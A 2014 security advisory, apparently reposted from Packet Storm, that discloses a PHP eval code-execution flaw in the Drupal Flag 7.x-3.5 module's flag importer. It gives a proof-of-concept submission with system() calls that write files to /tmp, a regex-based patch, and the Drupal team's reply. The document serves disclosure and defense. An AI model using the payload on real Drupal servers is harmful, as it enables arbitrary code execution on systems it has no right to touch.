Drupal Flag 7.x-3.5 Command Execution

2014-05-09T00:00:00
ID PACKETSTORM:126570
Type packetstorm
Reporter Ubani Anthony Balogun
Modified 2014-05-09T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Drupal Flag 7.x-3.5 Module Vulnerability Report  
  
Author: Ubani Anthony Balogun <ubani@sas.upenn.edu>  
Reported: May 07, 2014  
  
Module Description:  
- -------------------  
Flag is a flexible flagging system that is completely customizable by  
the administrator.  
Using this module, the site administrator can provide any number of  
flags for nodes, comments,  
users, and any other type of entity. Some possibilities include  
bookmarks, marking important,  
friends, or flag as offensive. With extensive views integration, you  
can create custom lists of  
popular content or keep tabs on important content.  
  
Description of Vulnerability:  
- -----------------------------  
The Flag 7.x-3.5 module contains an improper input handling (IH)  
vulnerability created by it's failure to validate user  
supplied PHP code, input via it's "flag importer" form, before using  
PHP's "eval" function to execute the code on the server.  
Using the flag importer form, a malicious user is able to execute  
arbitrary code with the permissions of the server on the host machine.  
  
Systems Impacted:  
- ----------------  
Drupal 7.26 with Flag 7.x-3.0 and Flag 7.x-3.5 (current recommended  
release) were tested and found to be vulnerable  
  
Impact:  
- -------  
Users with the permission to use the flag importer can inject and  
execute arbitrary code on the host server with server permissions.  
This vulnerability can be exploited to upload a malicious payload onto  
the vulnerable server, mount a Denial of Service (DoS) attack  
or effect other server-side attacks.  
  
  
Mitigating Factors:  
- -------------------  
This vulnerability is mitigated by the fact that a user must have  
permission to use the flag importer. The Flag module  
deactivates this permission by default for users other than site  
administrators, and cautions adminsitrators against granting  
this permission to other roles.  
  
Proof of Concept:  
- -----------------  
1. Install and enable the Flag module  
2. Using an account with permissions to use the flag importer,  
navigate to the flag import page (?q=admin/structure/flags/import)  
and submit the below code via the "Flag import code" text area:  
  
//Valid flag definition. This is required to successfully submit the  
flag import form  
$flags = array();  
// Exported flag: "Bookmarks".  
$flags['bookmarks'] = array (  
'entity_type' => 'node',  
'title' => 'Bookmarks',  
'global' => '0',  
'types' =>  
array (  
0 => 'article',  
1 => 'page',  
2 => 'people',  
),  
'flag_short' => 'Bookmark this',  
'flag_long' => 'Add this post to your bookmarks',  
'flag_message' => 'This post has been added to your bookmarks',  
'unflag_short' => 'Unbookmark this',  
'unflag_long' => 'Remove this post from your bookmarks',  
'unflag_message' => 'This post has been removed from your bookmarks',  
'unflag_denied_text' => '',  
'link_type' => 'toggle',  
'weight' => 0,  
'show_in_links' =>  
array (  
'full' => 'full',  
'teaser' => 'teaser',  
'rss' => 'rss',  
'search_index' => 'search_index',  
'search_result' => 'search_result',  
),  
'show_as_field' => 1,  
'show_on_form' => 1,  
'access_author' => '',  
'show_contextual_link' => 1,  
'i18n' => 0,  
'api_version' => 3,  
);  
// Malicious user input. Any amount of arbitrary code can be run after  
here and before the "return flags" statement  
system("whoami > /tmp/whoami.txt;");  
system("echo \"<?php echo 'I p0wn Server now'; ?>\" >>  
/tmp/do_evil.php;");  
return $flags;  
  
3. On the server machine, navigate to the /tmp directory to find the  
created files "whoami.txt" and "do_evil.php".  
"whoami.txt" contains the user who executed the code above  
(server). "do_evil.php" contains the PHP code submitted  
via the flag importer form above.  
Note: This proof of concept assumes a linux server is being used. This  
does not imply that non-linux systems are not  
vulnerable.  
  
Patch:  
- ------  
The following patch mitigates the vulnerability  
  
- --- flag-7.x-3.5_vuln/flag/includes/flag.export.inc 2014-05-03  
06:39:27.000000000 -0400  
+++  
/var/www/html/drupal-7.26/sites/all/modules/flag/includes/flag.export.inc  
2014-05-07 12:28:19.780973535 -0400  
@@ -99,8 +99,17 @@ function flag_import_form() {  
*/  
function flag_import_form_validate($form, &$form_state) {  
$flags = array();  
+  
+ $code = $form_state['values']['import'];  
+ $regex =  
'#\b(?:(?!array)(?!flags\[))(\$)*([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*\s*(\[.*|\(.*))#';  
# Regular expression to catch function calls except array(), and  
prevent all arrays that aren't of the form "flags[]" from being  
created and used  
+  
+ if (preg_match($regex,$code,$match)){  
+ form_set_error('import',t('The flag import failed because the  
following function call was detected in the code: %func',  
array('%func' => $match[0])));  
+ return;  
+ }  
+  
ob_start();  
- - eval($form_state['values']['import']);  
+ eval($code);  
ob_end_clean();  
  
if (!isset($flags) || !is_array($flags)) {  
  
  
Vendor Response:  
- ---------------------  
The Drupal Security team was contacted on May 8, 2014 and responded  
that because the permissions assignment page  
carries the warning "Warning: Give to trusted roles only; this  
permission has security implications." a coordinated  
security fix and announcement is not warranted.  
  
- --   
Ubani Anthony Balogun  
Information Security and Unix Services  
University of Pennsylvania  
School of Arts and Sciences  
3600 Market St.  
Suite 501  
Philadelphia, PA 19104  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/  
  
iQEcBAEBAgAGBQJTbPv1AAoJEKwVbF01qrx/j74IALNB7cp+fbaFMWTTQcTWSunk  
1lByAHMtowF+xaZTa0HV477jpTNH/TxgWp0Unck6RNiA9VL1EQ1tVwD7Zl9pH0x7  
e0UlKkbFQLWDrgxy3McVX0Zd99StH64727psMECMQuaIHRLUvMT4qQLPhjKcd+8t  
ikBSugPpPN8M+qmldiETurt7lA0khEPLGvep7k1x1FAtdqZB0D2s3CSmg5HT2TXu  
toE4Roo6dKXxgASXrgHw3jUVQQy9AUlIrG+K/KjjWKQOaJbXH7foUzKt9pmCYunO  
gjSZFHDru+7k2ScSGGWh+VP2Zs+seq5cIPydS8QawQX0T5fHfUine/sd+iyNvLc=  
=jfw7  
-----END PGP SIGNATURE-----  
  
  
`